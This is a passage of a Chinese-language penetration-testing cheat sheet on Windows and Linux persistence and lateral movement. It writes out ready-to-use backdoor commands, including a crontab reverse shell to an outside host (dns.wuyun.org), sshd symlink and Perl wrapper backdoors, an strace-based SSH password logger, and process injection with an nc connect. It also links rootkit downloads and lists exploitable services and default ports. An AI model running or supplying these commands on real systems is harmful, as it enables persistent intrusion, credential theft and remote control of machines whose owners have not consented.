<p>&#x901A;&#x8FC7;Rattler&#x81EA;&#x52A8;&#x679A;&#x4E3E;&#x8FDB;&#x7A0B;&#xFF0C;&#x68C0;&#x6D4B;&#x662F;&#x5426;&#x5B58;&#x5728;&#x53EF;&#x7528;dll&#x52AB;&#x6301;&#x5229;&#x7528;&#x7684;&#x8FDB;&#x7A0B;
&#x4F7F;&#x7528;&#xFF1A;Procmon&#x534A;&#x81EA;&#x52A8;&#x6D4B;&#x8BD5;&#x66F4;&#x7CBE;&#x51C6;&#xFF0C;&#x5E38;&#x89C4;&#x751F;&#x6210;&#x7684;dll&#x4F1A;&#x5BFC;&#x81F4;&#x7A0B;&#x5E8F;&#x6267;&#x884C;&#x62A5;&#x9519;&#x6216;&#x4E2D;&#x65AD;&#xFF0C;&#x4F7F;&#x7528;AheadLib&#x914D;&#x5408;&#x751F;&#x6210;dll&#x52AB;&#x6301;&#x5229;&#x7528;&#x6E90;&#x7801;&#x4E0D;&#x4F1A;&#x5F71;&#x54CD;&#x7A0B;&#x5E8F;&#x6267;&#x884C;
&#x5DE5;&#x5177;&#xFF1A;<a href="https://github.com/sensepost/rattler" target="_blank">https://github.com/sensepost/rattler</a>
&#x5DE5;&#x5177;&#xFF1A;<a href="https://github.com/Yonsm/AheadLib" target="_blank">https://github.com/Yonsm/AheadLib</a></p>
<h4 id="18&#x3001;doubleagent-"><a name="18&#x3001;doubleagent-" class="anchor-navigation-ex-anchor" href="#18&#x3001;doubleagent-"><i class="fa fa-link" aria-hidden="true"></i></a>18&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D" target="_blank">DoubleAgent </a>/)</h4>
<p>&#x7F16;&#x5199;&#x81EA;&#x5B9A;&#x4E49;Verifier provider DLL
&#x901A;&#x8FC7;Application Verifier&#x8FDB;&#x884C;&#x5B89;&#x88C5;
&#x6CE8;&#x5165;&#x5230;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x6267;&#x884C;payload
&#x6BCF;&#x5F53;&#x76EE;&#x6807;&#x8FDB;&#x7A0B;&#x542F;&#x52A8;&#xFF0C;&#x5747;&#x4F1A;&#x6267;&#x884C;payload&#xFF0C;&#x76F8;&#x5F53;&#x4E8E;&#x4E00;&#x4E2A;&#x81EA;&#x542F;&#x52A8;&#x7684;&#x65B9;&#x5F0F;
POC : <a href="https://github.com/Cybellum/DoubleAgent" target="_blank">https://github.com/Cybellum/DoubleAgent</a></p>
<h4 id="19&#x3001;waitforexe-"><a name="19&#x3001;waitforexe-" class="anchor-navigation-ex-anchor" href="#19&#x3001;waitforexe-"><i class="fa fa-link" aria-hidden="true"></i></a>19&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/" target="_blank">waitfor.exe </a></h4>
<p>&#x4E0D;&#x652F;&#x6301;&#x81EA;&#x542F;&#x52A8;&#xFF0C;&#x4F46;&#x53EF;&#x8FDC;&#x7A0B;&#x4E3B;&#x52A8;&#x6FC0;&#x6D3B;&#xFF0C;&#x540E;&#x53F0;&#x8FDB;&#x7A0B;&#x663E;&#x793A;&#x4E3A;waitfor.exe
POC : <a href="https://github.com/3gstudent/Waitfor-Persistence" target="_blank">https://github.com/3gstudent/Waitfor-Persistence</a></p>
<h4 id="20&#x3001;appdomainmanager"><a name="20&#x3001;appdomainmanager" class="anchor-navigation-ex-anchor" href="#20&#x3001;appdomainmanager"><i class="fa fa-link" aria-hidden="true"></i></a>20&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/" target="_blank">AppDomainManager</a></h4>
<p>&#x9488;&#x5BF9;.Net&#x7A0B;&#x5E8F;&#xFF0C;&#x901A;&#x8FC7;&#x4FEE;&#x6539;AppDomainManager&#x80FD;&#x591F;&#x52AB;&#x6301;.Net&#x7A0B;&#x5E8F;&#x7684;&#x542F;&#x52A8;&#x8FC7;&#x7A0B;&#x3002;&#x5982;&#x679C;&#x52AB;&#x6301;&#x4E86;&#x7CFB;&#x7EDF;&#x5E38;&#x89C1;.Net&#x7A0B;&#x5E8F;&#x5982;powershell.exe&#x7684;&#x542F;&#x52A8;&#x8FC7;&#x7A0B;&#xFF0C;&#x5411;&#x5176;&#x6DFB;&#x52A0;payload&#xFF0C;&#x5C31;&#x80FD;&#x5B9E;&#x73B0;&#x4E00;&#x79CD;&#x88AB;&#x52A8;&#x7684;&#x540E;&#x95E8;&#x89E6;&#x53D1;&#x673A;&#x5236;</p>
<h4 id="21&#x3001;office"><a name="21&#x3001;office" class="anchor-navigation-ex-anchor" href="#21&#x3001;office"><i class="fa fa-link" aria-hidden="true"></i></a>21&#x3001;Office</h4>
<p><a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/" target="_blank">&#x52AB;&#x6301;Office&#x8F6F;&#x4EF6;&#x7684;&#x7279;&#x5B9A;&#x529F;&#x80FD;</a>:&#x901A;&#x8FC7;dll&#x52AB;&#x6301;,&#x5728;Office&#x8F6F;&#x4EF6;&#x6267;&#x884C;&#x7279;&#x5B9A;&#x529F;&#x80FD;&#x65F6;&#x89E6;&#x53D1;&#x540E;&#x95E8;
<a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8/" target="_blank">&#x5229;&#x7528;VSTO&#x5B9E;&#x73B0;&#x7684;office&#x540E;&#x95E8;</a>
<a href="https://github.com/3gstudent/Office-Persistence" target="_blank">Office&#x52A0;&#x8F7D;&#x9879;</a></p>
<ul>
<li>Word WLL </li>
<li>Excel XLL </li>
<li>Excel VBA add-ins </li>
<li>PowerPoint VBA add-ins</li>
</ul>
<blockquote>
<p>&#x53C2;&#x8003;1 &#xFF1A;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/" target="_blank">https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/</a>
&#x53C2;&#x8003;2 &#xFF1A;<a href="https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/" target="_blank">https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/</a></p>
</blockquote>
<h4 id="22&#x3001;clr"><a name="22&#x3001;clr" class="anchor-navigation-ex-anchor" href="#22&#x3001;clr"><i class="fa fa-link" aria-hidden="true"></i></a>22&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/" target="_blank">CLR</a></h4>
<p>&#x65E0;&#x9700;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;&#x7684;&#x540E;&#x95E8;&#xFF0C;&#x5E76;&#x80FD;&#x591F;&#x52AB;&#x6301;&#x6240;&#x6709;.Net&#x7A0B;&#x5E8F;
POC:<a href="https://github.com/3gstudent/CLR-Injection" target="_blank">https://github.com/3gstudent/CLR-Injection</a></p>
<h4 id="23&#x3001;msdtc"><a name="23&#x3001;msdtc" class="anchor-navigation-ex-anchor" href="#23&#x3001;msdtc"><i class="fa fa-link" aria-hidden="true"></i></a>23&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/" target="_blank">msdtc</a></h4>
<p>&#x5229;&#x7528;MSDTC&#x670D;&#x52A1;&#x52A0;&#x8F7D;dll&#xFF0C;&#x5B9E;&#x73B0;&#x81EA;&#x542F;&#x52A8;&#xFF0C;&#x5E76;&#x7ED5;&#x8FC7;Autoruns&#x5BF9;&#x542F;&#x52A8;&#x9879;&#x7684;&#x68C0;&#x6D4B;
&#x5229;&#x7528;&#xFF1A;&#x5411; %windir%\system32\&#x76EE;&#x5F55;&#x6DFB;&#x52A0;dll&#x5E76;&#x91CD;&#x547D;&#x540D;&#x4E3A;oci.dll</p>
<h4 id="24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato"><a name="24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato" class="anchor-navigation-ex-anchor" href="#24&#x3001;hijack-caccpropservicesclass-and-mmdeviceenumerato"><i class="fa fa-link" aria-hidden="true"></i></a>24&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/" target="_blank">Hijack CAccPropServicesClass and MMDeviceEnumerato</a></h4>
<p>&#x5229;&#x7528;COM&#x7EC4;&#x4EF6;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;
&#x901A;&#x8FC7;&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;&#x5B9E;&#x73B0;
POC&#xFF1A;<a href="https://github.com/3gstudent/COM-Object-hijacking" target="_blank">https://github.com/3gstudent/COM-Object-hijacking</a> </p>
<h4 id="25&#x3001;hijack-explorerexe"><a name="25&#x3001;hijack-explorerexe" class="anchor-navigation-ex-anchor" href="#25&#x3001;hijack-explorerexe"><i class="fa fa-link" aria-hidden="true"></i></a>25&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/" target="_blank">Hijack explorer.exe</a></h4>
<p>COM&#x7EC4;&#x4EF6;&#x52AB;&#x6301;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x91CD;&#x542F;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x7BA1;&#x7406;&#x5458;&#x6743;&#x9650;
&#x901A;&#x8FC7;&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;&#x5B9E;&#x73B0;</p>
<pre class="language-"><code>HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}
HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}
</code></pre><h4 id="26&#x3001;windows-fax-dll-injection"><a name="26&#x3001;windows-fax-dll-injection" class="anchor-navigation-ex-anchor" href="#26&#x3001;windows-fax-dll-injection"><i class="fa fa-link" aria-hidden="true"></i></a>26&#x3001;Windows FAX DLL Injection</h4>
<p>&#x901A;&#x8FC7;DLL&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;Explorer.exe&#x5BF9;<code>fxsst.dll</code>&#x7684;&#x52A0;&#x8F7D;
Explorer.exe&#x5728;&#x542F;&#x52A8;&#x65F6;&#x4F1A;&#x52A0;&#x8F7D;<code>c:\Windows\System32\fxsst.dll</code>(&#x670D;&#x52A1;&#x9ED8;&#x8BA4;&#x5F00;&#x542F;&#xFF0C;&#x7528;&#x4E8E;&#x4F20;&#x771F;&#x670D;&#x52A1;)&#x3002;&#x5C06;payload.dll&#x4FDD;&#x5B58;&#x5728;<code>c:\Windows\fxsst.dll</code>&#xFF0C;&#x80FD;&#x591F;&#x5B9E;&#x73B0;dll&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;Explorer.exe&#x5BF9;<code>fxsst.dll</code>&#x7684;&#x52A0;&#x8F7D;</p>
<h4 id="27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;"><a name="27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;" class="anchor-navigation-ex-anchor" href="#27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;"><i class="fa fa-link" aria-hidden="true"></i></a>27&#x3001;&#x7279;&#x6B8A;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;</h4>
<p>&#x5728;&#x6CE8;&#x518C;&#x8868;&#x542F;&#x52A8;&#x9879;&#x521B;&#x5EFA;&#x7279;&#x6B8A;&#x540D;&#x79F0;&#x7684;&#x6CE8;&#x518C;&#x8868;&#x952E;&#x503C;&#xFF0C;&#x7528;&#x6237;&#x6B63;&#x5E38;&#x60C5;&#x51B5;&#x4E0B;&#x65E0;&#x6CD5;&#x8BFB;&#x53D6;(&#x4F7F;&#x7528;Win32 API)&#xFF0C;&#x4F46;&#x7CFB;&#x7EDF;&#x80FD;&#x591F;&#x6267;&#x884C;(&#x4F7F;&#x7528;Native API)&#x3002;
<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/" target="_blank">&#x300A;&#x6E17;&#x900F;&#x6280;&#x5DE7;&#x2014;&#x2014;&quot;&#x9690;&#x85CF;&quot;&#x6CE8;&#x518C;&#x8868;&#x7684;&#x521B;&#x5EFA;&#x300B;</a>
<a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/" target="_blank">&#x300A;&#x6E17;&#x900F;&#x6280;&#x5DE7;&#x2014;&#x2014;&quot;&#x9690;&#x85CF;&quot;&#x6CE8;&#x518C;&#x8868;&#x7684;&#x66F4;&#x591A;&#x6D4B;&#x8BD5;&#x300B;</a></p>
<h4 id="28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;"><a name="28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>28&#x3001;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x540E;&#x95E8;</h4>
<p>&#x66FF;&#x6362;&#x6211;&#x7684;&#x7535;&#x8111;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x542F;&#x52A8;&#x53C2;&#x6570;
POC : <a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1" target="_blank">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1</a></p>
<h4 id="29&#x3001;logon-scripts"><a name="29&#x3001;logon-scripts" class="anchor-navigation-ex-anchor" href="#29&#x3001;logon-scripts"><i class="fa fa-link" aria-hidden="true"></i></a>29&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/" target="_blank">Logon Scripts</a></h4>
<pre class="language-"><code>New-ItemProperty &quot;HKCU:\Environment\&quot; UserInitMprLogonScript -value &quot;c:\test\11.bat&quot; -propertyType string | Out-Null
</code></pre><h4 id="30&#x3001;password-filter-dll"><a name="30&#x3001;password-filter-dll" class="anchor-navigation-ex-anchor" href="#30&#x3001;password-filter-dll"><i class="fa fa-link" aria-hidden="true"></i></a>30&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/" target="_blank">Password Filter DLL</a></h4>
<h4 id="31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;"><a name="31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;" class="anchor-navigation-ex-anchor" href="#31&#x3001;&#x5229;&#x7528;bho&#x5B9E;&#x73B0;ie&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;"><i class="fa fa-link" aria-hidden="true"></i></a>31&#x3001;<a href="https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/" target="_blank">&#x5229;&#x7528;BHO&#x5B9E;&#x73B0;IE&#x6D4F;&#x89C8;&#x5668;&#x52AB;&#x6301;</a></h4>
<h3 id="linux_2"><a name="linux_2" class="anchor-navigation-ex-anchor" href="#linux_2"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h3>
<h4 id="crontab"><a name="crontab" class="anchor-navigation-ex-anchor" href="#crontab"><i class="fa fa-link" aria-hidden="true"></i></a>crontab</h4>
<p>&#x6BCF;60&#x5206;&#x949F;&#x53CD;&#x5F39;&#x4E00;&#x6B21;shell&#x7ED9;dns.wuyun.org&#x7684;53&#x7AEF;&#x53E3;</p>
<pre class="language-"><code>#!bash
(crontab -l;printf &quot;*/60 * * * * exec 9&lt;&gt; /dev/tcp/dns.wuyun.org/53;exec 0<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>&amp;9;exec</span> <span class="token attr-name">1</span><span class="token punctuation">&gt;</span></span>&amp;9 2&gt;<span class="token entity" title="&amp;1;">&amp;1;</span>/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n&quot;)|crontab -
</code></pre><h4 id="&#x786C;&#x94FE;&#x63A5;sshd"><a name="&#x786C;&#x94FE;&#x63A5;sshd" class="anchor-navigation-ex-anchor" href="#&#x786C;&#x94FE;&#x63A5;sshd"><i class="fa fa-link" aria-hidden="true"></i></a>&#x786C;&#x94FE;&#x63A5;sshd</h4>
<pre class="language-"><code>#!bash
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;
</code></pre><p>&#x8FDE;&#x63A5;&#xFF1A;ssh root@192.168.206.142 -p 2333</p>
<h4 id="ssh-server-wrapper"><a name="ssh-server-wrapper" class="anchor-navigation-ex-anchor" href="#ssh-server-wrapper"><i class="fa fa-link" aria-hidden="true"></i></a>SSH Server wrapper</h4>
<pre class="language-"><code>#!bash
cd /usr/sbin
mv sshd ../bin
echo &apos;#!/usr/bin/perl&apos; &gt;sshd
echo &apos;exec &quot;/bin/sh&quot; if (getpeername(STDIN) =~ /^..4A/);&apos; &gt;&gt;sshd
echo &apos;exec {&quot;/usr/bin/sshd&quot;} &quot;/usr/sbin/sshd&quot;,@ARGV,&apos; &gt;&gt;sshd
chmod u+x sshd
//&#x4E0D;&#x7528;&#x91CD;&#x542F;&#x4E5F;&#x884C;
/etc/init.d/sshd restart
</code></pre><pre class="language-"><code>socat STDIO TCP4:192.168.206.142:22,sourceport=13377
</code></pre><h4 id="ssh-keylogger"><a name="ssh-keylogger" class="anchor-navigation-ex-anchor" href="#ssh-keylogger"><i class="fa fa-link" aria-hidden="true"></i></a>SSH keylogger</h4>
<p>vim&#x5F53;&#x524D;&#x7528;&#x6237;&#x4E0B;&#x7684;.bashrc&#x6587;&#x4EF6;,&#x672B;&#x5C3E;&#x6DFB;&#x52A0;</p>
<pre class="language-"><code>#!bash
alias ssh=&apos;strace -o /tmp/sshpwd-`date &apos;+%d%h%m%s&apos;`.log -e read,write,connect -s2048 ssh&apos;
</code></pre><p>source .bashrc</p>
<h4 id="cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor"><a name="cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor" class="anchor-navigation-ex-anchor" href="#cymothoa&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor"><i class="fa fa-link" aria-hidden="true"></i></a>Cymothoa_&#x8FDB;&#x7A0B;&#x6CE8;&#x5165;backdoor</h4>
<pre class="language-"><code>./cymothoa -p 2270 -s 1 -y 7777
</code></pre><pre class="language-"><code>nc -vv ip 7777
</code></pre><h4 id="rootkit"><a name="rootkit" class="anchor-navigation-ex-anchor" href="#rootkit"><i class="fa fa-link" aria-hidden="true"></i></a>rootkit</h4>
<p><a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz" target="_blank">openssh_rootkit</a>
<a href="http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz" target="_blank">Kbeast_rootkit </a>
Mafix + Suterusu rootkit</p>
<h4 id="tools"><a name="tools" class="anchor-navigation-ex-anchor" href="#tools"><i class="fa fa-link" aria-hidden="true"></i></a>Tools</h4>
<p><a href="https://github.com/Screetsec/Vegile" target="_blank">Vegile </a>
<a href="https://github.com/icco/backdoor" target="_blank">backdoor </a></p>
<h2 id="web&#x540E;&#x95E8;"><a name="web&#x540E;&#x95E8;" class="anchor-navigation-ex-anchor" href="#web&#x540E;&#x95E8;"><i class="fa fa-link" aria-hidden="true"></i></a>WEB&#x540E;&#x95E8;</h2>
<p>PHP Meterpreter&#x540E;&#x95E8; 
Aspx Meterpreter&#x540E;&#x95E8; 
weevely 
webacoo<br>....</p>
<h1 id="&#x6A2A;&#x5411;&#x6E17;&#x900F;"><a name="&#x6A2A;&#x5411;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x6A2A;&#x5411;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6A2A;&#x5411;&#x6E17;&#x900F;</h1>
<h2 id="&#x7AEF;&#x53E3;&#x6E17;&#x900F;"><a name="&#x7AEF;&#x53E3;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x6E17;&#x900F;</h2>
<h3 id="&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1"><a name="&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x626B;&#x63CF;_1"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x626B;&#x63CF;</h3>
<ul>
<li>1.&#x7AEF;&#x53E3;&#x7684;&#x6307;&#x7EB9;&#x4FE1;&#x606F;&#xFF08;&#x7248;&#x672C;&#x4FE1;&#x606F;&#xFF09; </li>
<li>2.&#x7AEF;&#x53E3;&#x6240;&#x5BF9;&#x5E94;&#x8FD0;&#x884C;&#x7684;&#x670D;&#x52A1;  </li>
<li>3.&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x53F7;  </li>
<li>4.&#x5C1D;&#x8BD5;&#x5F31;&#x53E3;&#x4EE4; </li>
</ul>
<h3 id="&#x7AEF;&#x53E3;&#x7206;&#x7834;"><a name="&#x7AEF;&#x53E3;&#x7206;&#x7834;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x7206;&#x7834;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x7206;&#x7834;</h3>
<p><a href="https://github.com/vanhauser-thc/thc-hydra" target="_blank">hydra </a></p>
<h3 id="&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;"><a name="&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x5F31;&#x53E3;&#x4EE4;</h3>
<ul>
<li>NTScan  </li>
<li>Hscan  </li>
<li>&#x81EA;&#x5199;&#x811A;&#x672C; </li>
</ul>
<h3 id="&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;"><a name="&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x6EA2;&#x51FA;</h3>
<p><strong>smb</strong></p>
<ul>
<li>ms08067 </li>
<li>ms17010 </li>
<li>ms11058 </li>
<li>... </li>
</ul>
<p><strong>apache</strong>
<strong>ftp</strong> 
<strong>...</strong></p>
<h3 id="&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;"><a name="&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x89C1;&#x7684;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;</h3>
<h4 id="1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;"><a name="1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;" class="anchor-navigation-ex-anchor" href="#1&#x3001;web&#x7C7B;web&#x6F0F;&#x6D1E;&#x654F;&#x611F;&#x76EE;&#x5F55;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;web&#x7C7B;(web&#x6F0F;&#x6D1E;/&#x654F;&#x611F;&#x76EE;&#x5F55;)</h4>
<p>&#x7B2C;&#x4E09;&#x65B9;&#x901A;&#x7528;&#x7EC4;&#x4EF6;&#x6F0F;&#x6D1E;: struts thinkphp jboss ganglia zabbix ...</p>
<pre class="language-"><code>80 web 
80-89 web 
8000-9090 web
</code></pre><h4 id="2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;"><a name="2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x6570;&#x636E;&#x5E93;&#x7C7B;(&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;)</h4>
<pre class="language-"><code>1433 MSSQL 
1521 Oracle 
3306 MySQL 
5432 PostgreSQL 
50000 DB2
</code></pre><h4 id="3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;"><a name="3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;&#x672A;&#x6388;&#x6743;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;&#x7279;&#x6B8A;&#x670D;&#x52A1;&#x7C7B;(&#x672A;&#x6388;&#x6743;/&#x547D;&#x4EE4;&#x6267;&#x884C;&#x7C7B;/&#x6F0F;&#x6D1E;)</h4>
<pre class="language-"><code>443 SSL&#x5FC3;&#x810F;&#x6EF4;&#x8840; 
445 ms08067/ms11058/ms17010&#x7B49; 
873 Rsync&#x672A;&#x6388;&#x6743; 
5984 CouchDB http://xxx:5984/_utils/ 
6379 redis&#x672A;&#x6388;&#x6743; 
7001,7002 WebLogic&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x53CD;&#x5E8F;&#x5217; 
9200,9300 elasticsearch &#x53C2;&#x8003;WooYun: &#x591A;&#x73A9;&#x67D0;&#x670D;&#x52A1;&#x5668;ElasticSearch&#x547D;&#x4EE4;&#x6267;&#x884C;&#x6F0F;&#x6D1E; 
11211 memcache&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
27017,27018 Mongodb&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
50000 SAP&#x547D;&#x4EE4;&#x6267;&#x884C; 
50070,50030 hadoop&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;
